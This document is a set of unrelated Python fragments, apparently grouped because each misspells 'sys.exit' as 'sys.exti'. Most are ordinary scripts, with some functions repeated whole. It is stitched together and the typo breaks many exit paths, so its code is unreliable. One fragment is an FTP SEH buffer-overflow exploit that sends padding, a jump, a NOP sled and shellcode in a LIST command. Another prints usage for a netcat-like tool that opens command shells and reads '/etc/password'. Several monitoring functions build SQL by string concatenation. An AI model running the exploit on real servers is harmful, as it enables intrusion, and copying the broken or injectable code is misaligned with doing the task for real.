def collect(self): #收集平台信息, #根据平台不同执行不同方法 try: func = getattr(self, platform.system().lower()) info_data = func() formatted_data = self.build_report_data(info_data) return formatted_data except AttributeError: sys.exti('不支持当前[%s]操作系统!' % platform.system())
def main(): try: file_in = document_t(os.path.join("src", str(BOOK[2]))) if file_in is None: sys.exti(0) else: text = get_Text(file_in) #extracts text sayit(text) #text to speach except Exception as err: print(err)
def ucitajValutu(pitanje): while True: valuta = input(pitanje) valuta = valuta.upper() #oznaa u velika slova if valuta == "": sys.exti() if valuta in listaValuta: break else: print("Nazalost ", valuta, " nije u listi.") return valuta
def usage(): print "BHP Net Tool" print print "Usage: bhpnet.py -t target_host -p port" print "-1 --listen -listen on [host]:[port] for incoming connections" print "-e --execute=file_to_run = execute the given file upon receiving a connection" print "-c --command -initialize a command shell" print "-u --upload=destination - upn reciving connection upload a file and write to [destination]" print print print "Examples: " print "bhpnet.py -t 192.168.0.1 -p 5555 -1 -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -1 -u=c:\\target.exe" print "bhpnet.py -t 192.168.0.1 -[ 5555 -1 -e=\"cat /etc/password\"" sys.exti(0)
def draw_stone(SURFACE, field): for i in range(8): for j in range(8): stone = field[(i, j)] ypos = 37.5 + (75 * i) - 30 xpos = 137.5 + (75 * j) - 30 if (stone == BLACK): pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (60, 60))) elif (stone == WHITE): pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (60, 60)), 5) elif (stone == EMPTY): pass else: print("error") sys.exti()
def draw_stone(SURFACE, field): for i in range(4): for j in range(4): stone = field[(i, j)] ypos = 75 + (150 * i) - 60 xpos = 175 + (150 * j) - 60 if (stone == BLACK): pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (120, 120))) elif (stone == WHITE): pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (120, 120)), 10) elif (stone == EMPTY): pass else: print("error") sys.exti()
def main(): if len(sys.argv) < 2: print("Usage need picture path") sys.exti(1) PWD = os.path.abspath(os.path.dirname(__file__)) model_path = PWD + '/model.h5' model_link = 'https://s3-us-west-1.amazonaws.com/carndmodel/model.h5' if not os.path.exists(model_path): print('Need download the models from AWS') urllib.urlretrieve(model_link, model_path) else: print('models from AWS existed, good to go') path = sys.argv[1] start = time.time() model = load_model('model.h5') end = time.time() print('Load model time', end - start) model.summary() #test1_img = cv2.imread('trafficlight_images/1_image306_resize.jpg') test1_img = cv2.imread(path) test1_img = cv2.resize(test1_img, (100, 200), interpolation=cv2.INTER_CUBIC) test1_img = np.asarray(test1_img) / 255 test = np.array([test1_img,]) start = time.time() test_pred = model.predict(test) end = time.time() print('Predict time', end - start) test_pred = np.round(test_pred) print(test_pred) if test_pred[0][0] == 1.0: print(path, 'is Red Light') elif test_pred[0][1] == 1.0: print(path, 'is Yellow Light') elif test_pred[0][2] == 1.0: print(path, 'is Green Light') else: print(path, 'is unknown???')
def main(): if len(sys.argv) > 1: usage() return -1 kernel_dir = "prebuilts/lite/sysroot/ohos_tmp" external_dir = '/prebuilts/lite/sysroot/ohos_tmp_ori/uapi' status = -1 try: build_top = os.environ["Z_BUILD_TOP"] except KeyError as e: print("[Warning] no env : %s, use current work dir." % (str(e))) build_top = subprocess.check_output("pwd", shell=True) status = copy_kernel_headers(build_top.strip(), external_dir, kernel_dir) if status != 1: print("[Error] copy files fail!!!") sys.exti(1) try: os.chdir(kernel_dir + "/uapi") except: print("[Error] no uapi dir1!!!") sys.exit(1) current_dir = os.getcwd() if "uapi" not in current_dir: print("[Error] not uapi dir!!!") sys.exit(1) for val in key_list: replace_key_words_ext(val) try: os.chdir("../") except: print("[Error] no uapi dir2!!!") sys.exit(1) deal_dir("uapi") return 1
def parseCommandLine(): try: opts,args = getopt.getopt(sys.argv[1:], shortopts , longopts) except getopt.GetoptError as err: #pint help info and exit print(err) useage() sys.exti(2) output = None verbose = False for o,a in opts: if o == "-v": verbose = True elif o in ("-h", "--help"): useage() sys.exit() elif o in ("-o", "--output"): output = a else: assert False, "unhandled option"
def Check_Installed(): if not Check(): print Fore.RED + "Directory structure not present. Attempting to create..." + Style.RESET_ALL try: Create() except: print Fore.RED + "Unable to create directory structure!" print Fore.RED + "Please check you have appropriate permissions to write to ~/" print Fore.RED + "Inception will now exit..." + Style.RESET_ALL sys.exit() print "[*] Directory structure created." if not Check_DB_Exists(): print Fore.RED + "Database not initialised. Attempting to create..." + Style.RESET_ALL try: Create_Schema() except: print Fore.RED + "Error initialising database." print Fore.RED + "Inception will now exit..." + Style.RESET_ALL sys.exti() print "[*] Database initialised." print "[*] Initial setup complete!"
def check_ovs_version(min_required_version, root_helper): LOG.debug(_("Checking OVS version for VXLAN support")) installed_klm_version = ovs_lib.get_installed_ovs_klm_version() installed_usr_version = ovs_lib.get_installed_ovs_usr_version(root_helper) # First check the userspace version if installed_usr_version: if dist_version.StrictVersion( installed_usr_version) < dist_version.StrictVersion( min_required_version): LOG.error( _('Failed userspace version check for Open ' 'vSwitch with VXLAN support. To use ' 'VXLAN tunnels with OVS, please ensure ' 'the OVS version is %s ' 'or newer!'), min_required_version) sys.exit(1) # Now check the kernel version if installed_klm_version: if dist_version.StrictVersion( installed_klm_version) < dist_version.StrictVersion( min_required_version): LOG.error( _('Failed kernel version check for Open ' 'vSwitch with VXLAN support. To use ' 'VXLAN tunnels with OVS, please ensure ' 'the OVS version is %s or newer!'), min_required_version) sys.exti(1) else: LOG.warning( _('Cannot determine kernel Open vSwitch version, ' 'please ensure your Open vSwitch kernel module ' 'is at least version %s to support VXLAN ' 'tunnels.'), min_required_version) else: LOG.warning( _('Unable to determine Open vSwitch version. Please ' 'ensure that its version is %s or newer to use VXLAN ' 'tunnels with OVS.'), min_required_version) sys.exit(1)
def check_ovs_version(min_required_version, root_helper): LOG.debug(_("Checking OVS version for VXLAN support")) installed_klm_version = ovs_lib.get_installed_ovs_klm_version() installed_usr_version = ovs_lib.get_installed_ovs_usr_version(root_helper) # First check the userspace version if installed_usr_version: if dist_version.StrictVersion( installed_usr_version) < dist_version.StrictVersion( min_required_version): LOG.error(_('Failed userspace version check for Open ' 'vSwitch with VXLAN support. To use ' 'VXLAN tunnels with OVS, please ensure ' 'the OVS version is %s ' 'or newer!'), min_required_version) sys.exit(1) # Now check the kernel version if installed_klm_version: if dist_version.StrictVersion( installed_klm_version) < dist_version.StrictVersion( min_required_version): LOG.error(_('Failed kernel version check for Open ' 'vSwitch with VXLAN support. To use ' 'VXLAN tunnels with OVS, please ensure ' 'the OVS version is %s or newer!'), min_required_version) sys.exti(1) else: LOG.warning(_('Cannot determine kernel Open vSwitch version, ' 'please ensure your Open vSwitch kernel module ' 'is at least version %s to support VXLAN ' 'tunnels.'), min_required_version) else: LOG.warning(_('Unable to determine Open vSwitch version. Please ' 'ensure that its version is %s or newer to use VXLAN ' 'tunnels with OVS.'), min_required_version) sys.exit(1)
manga_dir = CONFIG.manga_directory / old_title if not manga_dir.is_dir(): return False if (manga_dir.parent / new_title).exists(): confirm = utils.ask_confirmation( "Do you want to rename the exisitng files?\n" "Existing file/directory found, this action will overwrite it. " "Are you sure you want to continue?") pass else: confirm = utils.ask_confirmation("Do you want to rename the exisitng files?") if not confirm: return False for chapter_dir in manga_dir.iterdir(): if chapter_dir.is_dir(): for page in chapter_dir.iterdir(): new_file_name = page.name.replace(old_title, new_title, 1) page.rename(page.parent / new_file_name) else: new_file_name = chapter_dir.name.replace(old_title, new_title, 1) chapter_dir.rename(chapter_dir.parent / new_file_name) manga_dir.rename(manga_dir.parent / new_title) print("Files have been renamed") return True if __name__ == '__main__': sys.exti(main())
logger.debug('logger initialized') # CSV configuration csvfile = set_filename(filename) dirname = set_dir(directory) csv_header = create_csv_header() c = None try: logger.debug('Setting up CSV file %s/%s.csv' % (dirname, csvfile)) c = csv.writer(open(dirname+"/"+csvfile+".csv", "wb"), quoting=csv.QUOTE_ALL) c.writerow(csv_header) logger.info('Successfully created CSV file %s/%s.csv' % (dirname, csvfile)) except IOException as inst: logger.error(inst) logger.error('Due to previous errors, program will exit') sys.exti() # Asking Users password for server if password is None: logger.debug('No command line password received, requesting password from user') password = getpass.getpass(prompt='Enter password for vCenter %s for user %s: ' % (servervctr,username)) # Connecting to server logger.info('Connecting to server %s with username %s' % (servervctr,username)) server = VIServer() try: logger.debug('Trying to connect with provided credentials') server.connect(servervctr,username,password) logger.info('Connected to server %s' % servervctr) logger.debug('Server type: %s' % server.get_server_type())
def main(): """Run multiple routines to log system info. * Run the ps routine to get information about active processes (and log it to the database), * Run the symon001 stored procedure to get various record counts (and log it to the databse), * Run vmstat and save memory and CPU info, * Collect and log information of files that have been accessed, * Collect and log nstat data for network IO. """ global CONFIG_FNAME global MAIN_CONFIG global DBNAME global HOSTNAME global DB_UNAME global DB_PW global CONN_STR global MON_FILE_LIST out = {} MAIN_CONFIG = configparser.ConfigParser() MAIN_CONFIG.read(CONFIG_FNAME) DBNAME = MAIN_CONFIG['global']['DBNAME'] HOSTNAME = MAIN_CONFIG['global']['HOSTNAME'] DB_UNAME = MAIN_CONFIG['global']['DB_UNAME'] DB_PW = MAIN_CONFIG['global']['DB_PW'] CONN_STR = "host=" + HOSTNAME + " dbname=" + DBNAME + " user="******" password='******'" if 'MON_FILE_LIST' in MAIN_CONFIG['global']: tmp_list = MAIN_CONFIG['global']['MON_FILE_LIST'] MON_FILE_LIST = tmp_list.split(',') else: MON_FILE_LIST = [] if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '': print('Error, database connection details are missing.') sys.exti(15) # ------------------------------------------------------------------------- conn, msg_d = shardfuncs.shard_connect(CONN_STR) if conn is None: print(shardfuncs.safe_string(msg_d)) raise RuntimeError( shardfuncs.err_log(110015, 'Failed to ' + 'make a database connection in ' + 'nm_db_table_names', extra_msg=msg_d)) cur = conn.cursor() # ------------------------------------------------------------------------- ps_write_count = 0 rc, msg_d = ps() try: # Get the dictionary object from the file monitor: rslts = msg_d['ps'] except Exception: print('I did not find a nonexistant key') if rslts is not None: for k, v in rslts.items(): # The 'k' values here are numeric values # for the pid. # k=1046 v={'ppid': '1', 'uid': '0', 'time': '00:00:26', # 'cmd': 'SCREEN', 'parms': ''} cmd = 'INSERT INTO shardsvr.sysmon_ps(' + \ ' ppid, uid, time, cmd, parms, sysmon_ps_dt) VALUES(' + \ str(v['ppid']) + ', ' + \ str(v['uid']) + ', ' + '0' + ', ' + \ "'" + str(v['cmd']) + "', '" + str(v['parms']) + "', " + \ datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR77777: ' + repr(msg)) else: ps_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('ps write count: ' + str(ps_write_count)) # ------------------------------------------------------------------------- # sysmon001: stored procedure to get table counts # rec_counts_write_count = 0 # Run the sysmon001 stored procedure to # capture a bunch of record counts and save # them to shardsvr.sysmon_rec_counts: cmd = 'SELECT shardsvr.sysmon001();' rc, my_data, msg = shardfuncs.shard_sql_select(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR111111: ' + repr(msg)) else: rec_counts_write_count += 1 print('rec_counts_write_count = ' + str(rec_counts_write_count)) # ------------------------------------------------------------------------- # vmstat - collect memory and CPU info # rc, msg_d = vmstat() out.update(msg_d) rslts = None vmstat_write_count = 0 try: # Get the dictionary object from the file monitor: rslts = msg_d['vmstat'] except Exception: print('Error. I did not find vmstat output.') if rslts is not None: v = rslts # Note: two table fields have '-' replaced with '_': # non-nice_user_cpu_ticks and IO-wait_cpu_ticks cmd = 'INSERT INTO shardsvr.sysmon_vmstat (' \ + 'K_total_memory, K_used_memory, K_active_memory, ' \ + 'K_free_memory, K_swap_cache, ' \ + 'K_total_swap, K_free_swap, ' \ + 'non_nice_user_cpu_ticks, nice_user_cpu_ticks, ' \ + 'system_cpu_ticks, idle_cpu_ticks, IO_wait_cpu_ticks, ' \ + 'boot_time, sysmon_vmstat_dt) ' \ + 'VALUES (' + str(v['K_total_memory']) + ', ' \ + str(v['K_used_memory']) + ', ' \ + str(v['K_active_memory']) + ', ' \ + str(v['K_free_memory']) + ', ' \ + str(v['K_swap_cache']) + ', ' \ + str(v['K_total_swap']) + ', ' \ + str(v['K_free_swap']) + ', ' \ + str(v['non-nice_user_cpu_ticks']) + ', ' \ + str(v['nice_user_cpu_ticks']) + ', ' \ + str(v['system_cpu_ticks']) + ', ' \ + str(v['idle_cpu_ticks']) + ', ' \ + str(v['IO-wait_cpu_ticks']) + ', ' \ + str(v['boot_time']) + ', ' + datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR999999: ' + repr(msg)) else: vmstat_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('vmstat write count: ' + str(vmstat_write_count)) # ------------------------------------------------------------------------- # File Monior # # (collect file attributes for specific files) # if len(MON_FILE_LIST) > 0: for fname in MON_FILE_LIST: rc, msg_d = mon_file(fname) out.update(msg_d) rslts = None try: # Get the dictionary object from the file monitor: rslts = msg_d['mon_file'] except Exception: print('I did not find results from the file_monitor.') file_write_count = 0 if rslts is not None: for k, v in rslts.items(): # There could be many files here fname = re.sub(r'[\'"\r\t\n]', '', k[0:200]) # These are file attributes # file_type, inode, change_time, # access_time, mod_time. cmd = 'INSERT INTO shardsvr.sysmon_file(' \ 'file_name, file_type, ' \ 'inode, chg_time, access_time, ' \ 'mod_time, sysmon_file_dt ) ' \ 'VALUES(' + "'" + fname + "', " \ + str(v['file_type']) + ', ' \ + str(v['inode']) + ', ' \ + str(v['change_time']) + ', ' \ + str(v['access_time']) + ', ' \ + str(v['mod_time']) + ', ' \ + datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR33333: ' + repr(msg)) else: file_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('file write count: ' + str(file_write_count)) # ------------------------------------------------------------------------- # nstat - Network IO stats # rc, msg_d = nstat() out.update(msg_d) try: # Get the dictionary object from the file monitor: rslts = msg_d['nstat'] except Exception: print('I did not find the nstat dictionary key.') if rslts is not None: v = rslts nstat_write_count = 0 cmd = 'INSERT INTO shardsvr.sysmon_nstat(' + \ 'IpExtInOctets, IpExtOutOctets, ' + \ 'IpInReceives, TcpActiveOpens, TcpPassiveOpens, ' + \ 'IpOutRequests, sysmon_nstat_dt) ' + \ 'VALUES( ' \ + str(v['IpExtInOctets']) + ', ' \ + str(v['IpExtOutOctets']) + ', ' \ + str(v['IpInReceives']) + ', ' + str(v['TcpActiveOpens']) + ', ' \ + str(v['TcpPassiveOpens']) + ', ' \ + str(v['IpOutRequests']) + ', ' \ + datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR8888: ' + repr(msg)) else: nstat_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('nstat write count: ' + str(nstat_write_count))
if M[i][j] == -1: s_length = s_length + 1 L1.append(s_length) s_length = 0 if M[i][0] == -1: L1.pop(0) L[i] = L1 L1 = [] return L try: TunnelFile = input("Enter Tunnel File Name: ").strip() except FileNotFoundError: print("File doesn't exist. Enter valid filename.") sys.exti() try: with open(TunnelFile) as tFile: No_of_Lines = 0 InputList = [] for line in tFile: line1 = line.rstrip() if len(line1) != 0: No_of_Lines = No_of_Lines + 1 InputList.append(line1) #print(InputList) if (No_of_Lines != 2): print("The file has more than two lines of data.") raise ValueError UpArray = []
nseh = "\xeb\x06\x90\x90"# jmp short 6 bytes payload = '\x41' * 453 + nseh + seh + '\x90' * 16 + shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connect to %s on port %d " % (target,21) try: s.connect((target,21)) s.recv(1024) s.send('USER jeff\r\n') s.recv(1024) s.send('PASS 123qwe\r\n') s.recv(1024) s.send("LIST" + payload + "\r\n" ) print "[+] Sending payload of size " + str(len(payload)) + " Bytes" s.close() print "[+] Exploit Sent Sucessfully" except: print "[-] Could not connect to " + target + ":21\r" sys.exti(0)
#pprint.pprint ( V ); def main(): # parse command line options try: opts, args = getopt.getopt(sys.argv[1:], "h", ["help"]) except getopt.error, msg: print msg print "for help use --help" sys.exit(2) # process options for o, a in opts: if o in ("-h", "--help"): print __doc__ sys.exit(0) # process arguments if (len(args) == 1): process(args[0]) # process() is defined elsewhere elif (len(args) == 2): process(args[0], extra=args[1]) else: print "pass with one or two args" sys.exti(4) from RTN_byname_target import * if __name__ == "__main__": main()
def ReRange(path): RootPath = path allCountries = os.listdir(RootPath) for x in allCountries: if os.path.isdir(x) and x.endswith('村'): dirsInOneCountry = os.listdir(x) resPath = os.path.join(RootPath, x, 'temp\\') bResPath = False if os.path.exists(resPath): if os.listdir(resPath): bResPath = True else: shutil.rmtree(resPath) for y in dirsInOneCountry: if not bResPath and '承包地块调查表' in y: shutil.copytree(os.path.join(RootPath, x, y), resPath) #结果文件 break persons = os.listdir(resPath) subCountryPath = os.path.join(RootPath, x) for y in dirsInOneCountry: subCountryPath = os.path.join(RootPath, x, y) if '承包方调查表' in y: CBFDCBs = os.listdir(subCountryPath) for z in CBFDCBs: name = z.split('-')[1] if name in persons: shutil.copy(os.path.join(subCountryPath, z), os.path.join(resPath, name, z)) if '公示结果归户表' in y: GHBs = os.listdir(subCountryPath) for z in GHBs: name = z.split('-')[0] if name in persons: shutil.copy(os.path.join(subCountryPath, z), os.path.join(resPath, name, z)) if '农户代表声明书' in y: SMSs = os.listdir(subCountryPath) for z in SMSs: name = z.split('-')[1] if name in persons: shutil.copy(os.path.join(subCountryPath, z), os.path.join(resPath, name, z)) if '承包合同' in y: HTs = os.listdir(subCountryPath) for z in HTs: name = z.split('-')[1] if name in persons: shutil.copy(os.path.join(subCountryPath, z), os.path.join(resPath, name, z)) if '发包方调查表' in y: FBFDCBs = os.listdir(subCountryPath) if len(FBFDCBs) == 1: FBFDM1 = FBFDCBs[0].split('(')[1] FBFDM = FBFDM1.split(')')[0] else: print("发包方调查表中有多个文件,请检查") quit('请按任意键退出...') sys.exti(1) # rename if FBFDM != "": for y in dirsInOneCountry: if '承包方调查表' in y: CBFDCBs = os.listdir(os.path.join(RootPath, x, y)) for z in CBFDCBs: CBF_CODE = z.split('-')[0] CBF_NAME = z.split('-')[1] CBF_CODE_NAME = CBF_CODE + '_' + CBF_NAME name = z.split('-')[1] if name in persons: personFiles = os.listdir( os.path.join(resPath, name)) for w in personFiles: if '归户表' in w and not os.path.exists( os.path.join( resPath, name, FBFDM + CBF_CODE + '-' + w)): os.rename( os.path.join(resPath, name, w), os.path.join( resPath, name, FBFDM + CBF_CODE + '-' + w)) if '归户表' not in w and not os.path.exists( os.path.join( resPath, name, FBFDM + w)): os.rename( os.path.join(resPath, name, w), os.path.join( resPath, name, FBFDM + w)) os.rename( os.path.join(resPath, name), os.path.join(resPath, FBFDM + CBF_CODE_NAME)) if not os.path.exists( os.path.join(RootPath, x, FBFDM + CBF_CODE_NAME)): shutil.move( os.path.join(resPath, FBFDM + CBF_CODE_NAME), os.path.join(RootPath, x)) shutil.rmtree(resPath)
CONFIG_FNAME = '/var/natmsg/conf/housekeeping_shardsvr.conf' MAIN_CONFIG = configparser.ConfigParser() MAIN_CONFIG.read(CONFIG_FNAME) DBNAME = MAIN_CONFIG['global']['DBNAME'] HOSTNAME = MAIN_CONFIG['global']['HOSTNAME'] DB_UNAME = MAIN_CONFIG['global']['DB_UNAME'] DB_PW = MAIN_CONFIG['global']['DB_PW'] if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '': print('Error, database connection details are missing.') sys.exti(15) ############################################################################## datestamp = datetime.datetime.now() datestamp_sql = "'" + str(datestamp.year) + "-" \ + str(datestamp.month).zfill(2) \ + "-" + str(datestamp.day).zfill(2) + ' ' \ + str(datestamp.hour).zfill(2) \ + ':' + str(datestamp.minute).zfill(2) + ':' \ + str(datestamp.second).zfill(2) + "'::timestamp " ## print('datestamp: ' + datestamp_sql) ############################################################ # register the ssl keys and a few shards that # I create that should never be read out = {}
def main(): """Run multiple routines to log system info. * Run the ps routine to get information about active processes (and log it to the database), * Run the symon001 stored procedure to get various record counts (and log it to the databse), * Run vmstat and save memory and CPU info, * Collect and log information of files that have been accessed, * Collect and log nstat data for network IO. """ global CONFIG_FNAME global MAIN_CONFIG global DBNAME global HOSTNAME global DB_UNAME global DB_PW global CONN_STR global MON_FILE_LIST out = {} MAIN_CONFIG = configparser.ConfigParser() MAIN_CONFIG.read(CONFIG_FNAME) DBNAME = MAIN_CONFIG['global']['DBNAME'] HOSTNAME = MAIN_CONFIG['global']['HOSTNAME'] DB_UNAME = MAIN_CONFIG['global']['DB_UNAME'] DB_PW = MAIN_CONFIG['global']['DB_PW'] CONN_STR = "host=" + HOSTNAME + " dbname=" + DBNAME + " user="******" password='******'" if 'MON_FILE_LIST' in MAIN_CONFIG['global']: tmp_list = MAIN_CONFIG['global']['MON_FILE_LIST'] MON_FILE_LIST = tmp_list.split(',') else: MON_FILE_LIST= [] if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '': print('Error, database connection details are missing.') sys.exti(15) # ------------------------------------------------------------------------- conn, msg_d = shardfuncs.shard_connect(CONN_STR) if conn is None: print(shardfuncs.safe_string(msg_d)) raise RuntimeError(shardfuncs.err_log(110015, 'Failed to ' + 'make a database connection in ' + 'nm_db_table_names', extra_msg=msg_d)) cur = conn.cursor() # ------------------------------------------------------------------------- ps_write_count = 0 rc, msg_d = ps() try: # Get the dictionary object from the file monitor: rslts = msg_d['ps'] except Exception: print('I did not find a nonexistant key') if rslts is not None: for k, v in rslts.items(): # The 'k' values here are numeric values # for the pid. # k=1046 v={'ppid': '1', 'uid': '0', 'time': '00:00:26', # 'cmd': 'SCREEN', 'parms': ''} cmd = 'INSERT INTO shardsvr.sysmon_ps(' + \ ' ppid, uid, time, cmd, parms, sysmon_ps_dt) VALUES(' + \ str(v['ppid']) + ', ' + \ str(v['uid']) + ', ' + '0' + ', ' + \ "'" + str(v['cmd']) + "', '" + str(v['parms']) + "', " + \ datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR77777: ' + repr(msg)) else: ps_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('ps write count: ' + str(ps_write_count)) # ------------------------------------------------------------------------- # sysmon001: stored procedure to get table counts # rec_counts_write_count = 0 # Run the sysmon001 stored procedure to # capture a bunch of record counts and save # them to shardsvr.sysmon_rec_counts: cmd = 'SELECT shardsvr.sysmon001();' rc, my_data, msg = shardfuncs.shard_sql_select(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR111111: ' + repr(msg)) else: rec_counts_write_count += 1 print('rec_counts_write_count = ' + str(rec_counts_write_count)) # ------------------------------------------------------------------------- # vmstat - collect memory and CPU info # rc, msg_d = vmstat() out.update(msg_d) rslts = None vmstat_write_count = 0 try: # Get the dictionary object from the file monitor: rslts = msg_d['vmstat'] except Exception: print('Error. I did not find vmstat output.') if rslts is not None: v = rslts # Note: two table fields have '-' replaced with '_': # non-nice_user_cpu_ticks and IO-wait_cpu_ticks cmd = 'INSERT INTO shardsvr.sysmon_vmstat (' \ + 'K_total_memory, K_used_memory, K_active_memory, ' \ + 'K_free_memory, K_swap_cache, ' \ + 'K_total_swap, K_free_swap, ' \ + 'non_nice_user_cpu_ticks, nice_user_cpu_ticks, ' \ + 'system_cpu_ticks, idle_cpu_ticks, IO_wait_cpu_ticks, ' \ + 'boot_time, sysmon_vmstat_dt) ' \ + 'VALUES (' + str(v['K_total_memory']) + ', ' \ + str(v['K_used_memory']) + ', ' \ + str(v['K_active_memory']) + ', ' \ + str(v['K_free_memory']) + ', ' \ + str(v['K_swap_cache']) + ', ' \ + str(v['K_total_swap']) + ', ' \ + str(v['K_free_swap']) + ', ' \ + str(v['non-nice_user_cpu_ticks']) + ', ' \ + str(v['nice_user_cpu_ticks']) + ', ' \ + str(v['system_cpu_ticks']) + ', ' \ + str(v['idle_cpu_ticks']) + ', ' \ + str(v['IO-wait_cpu_ticks']) + ', ' \ + str(v['boot_time']) + ', ' + datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR999999: ' + repr(msg)) else: vmstat_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('vmstat write count: ' + str(vmstat_write_count)) # ------------------------------------------------------------------------- # File Monior # # (collect file attributes for specific files) # if len(MON_FILE_LIST) > 0: for fname in MON_FILE_LIST: rc, msg_d = mon_file(fname) out.update(msg_d) rslts = None try: # Get the dictionary object from the file monitor: rslts = msg_d['mon_file'] except Exception: print('I did not find results from the file_monitor.') file_write_count = 0 if rslts is not None: for k, v in rslts.items(): # There could be many files here fname = re.sub(r'[\'"\r\t\n]', '', k[0:200]) # These are file attributes # file_type, inode, change_time, # access_time, mod_time. cmd = 'INSERT INTO shardsvr.sysmon_file(' \ 'file_name, file_type, ' \ 'inode, chg_time, access_time, ' \ 'mod_time, sysmon_file_dt ) ' \ 'VALUES(' + "'" + fname + "', " \ + str(v['file_type']) + ', ' \ + str(v['inode']) + ', ' \ + str(v['change_time']) + ', ' \ + str(v['access_time']) + ', ' \ + str(v['mod_time']) + ', ' \ + datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR33333: ' + repr(msg)) else: file_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('file write count: ' + str(file_write_count)) # ------------------------------------------------------------------------- # nstat - Network IO stats # rc, msg_d = nstat() out.update(msg_d) try: # Get the dictionary object from the file monitor: rslts = msg_d['nstat'] except Exception: print('I did not find the nstat dictionary key.') if rslts is not None: v = rslts nstat_write_count = 0 cmd = 'INSERT INTO shardsvr.sysmon_nstat(' + \ 'IpExtInOctets, IpExtOutOctets, ' + \ 'IpInReceives, TcpActiveOpens, TcpPassiveOpens, ' + \ 'IpOutRequests, sysmon_nstat_dt) ' + \ 'VALUES( ' \ + str(v['IpExtInOctets']) + ', ' \ + str(v['IpExtOutOctets']) + ', ' \ + str(v['IpInReceives']) + ', ' + str(v['TcpActiveOpens']) + ', ' \ + str(v['TcpPassiveOpens']) + ', ' \ + str(v['IpOutRequests']) + ', ' \ + datestamp_sql + ');' rc, msg = shardfuncs.shard_sql_insert(cur, cmd) if rc != 0: out.update({'Error': 'SQL insert command failed.'}) out.update({'Error-detail': msg['Error']}) conn.close() print('ERROR8888: ' + repr(msg)) else: nstat_write_count += 1 # the sql-write loop is done, now commit cur.execute('commit;') # do not conn.close() until the end (or on error) out.update({'status': "OK"}) print('nstat write count: ' + str(nstat_write_count))
def main(): class ReadAD: def __init__(self, start=0): self.lock = threading.Lock() self.value = start def read_AD(self, indice): logging.debug('Waiting for lock') self.lock.acquire() try: self.timeout = False logging.debug('Acquired lock') vcc = nodos_activos[indice].get_parameter("%V") vcc = int(utils.hex_to_string(vcc).replace(' ', ''), 16) # Leemos el valor crudo de las entradas analógicas raw_value_1 = nodos_activos[indice].get_adc_value(IOLINE_IN_0) raw_value_2 = nodos_activos[indice].get_adc_value(IOLINE_IN_1) raw_value_3 = nodos_activos[indice].get_adc_value(IOLINE_IN_2) raw_value_4 = nodos_activos[indice].get_adc_value(IOLINE_IN_3) # Calculamos el valor de temperatura en cada entrada en función de la tensión de alimentación y del tntc_1 = ntc10k_calculate_temp(raw_value_1, vcc) tntc_2 = ntc10k_calculate_temp(raw_value_2, vcc) tntc_3 = ntc10k_calculate_temp(raw_value_3, vcc) tntc_4 = ntc10k_calculate_temp(raw_value_4, vcc) # ************************************************************************ # ESTA ES LA PARTE DE TELEGRAF send_data_to_telegraf.main(REMOTE_NODES_ID[indice], tntc_1, tntc_2, tntc_3, tntc_4, float(vcc)) except TimeoutException: self.timeout = True logging.debug('ADC error') local_device.reset() finally: self.lock.release() return self.timeout # función que realiza las tareas de lectura de las entradas en los nodos timeouts = [] def worker(c, i): #La petición se hace con tiempo variable, si no responde, esto es si da timeout se hacen más rápidas para ver #si el nodo estaba en una secuencia de sueño, si sobre pasa el límite de timeouts cortos ya no se le pregunta más timeouts.append(0) try: while True and (timeouts[i] < MAX_INTENTOS_LEER_DATOS): logging.debug('Stamp: %s', str(datetime.now())) logging.debug("TIMEOUTS %s", timeouts) #estudiar bien esto y quitar if c.read_AD(i): timeouts[i] += 1 logging.debug("Timeouts %s", timeouts) pause = SHORT_WAIT else: #timeouts[i] = 0 #reseteamos la cuenta de timeouts pause = 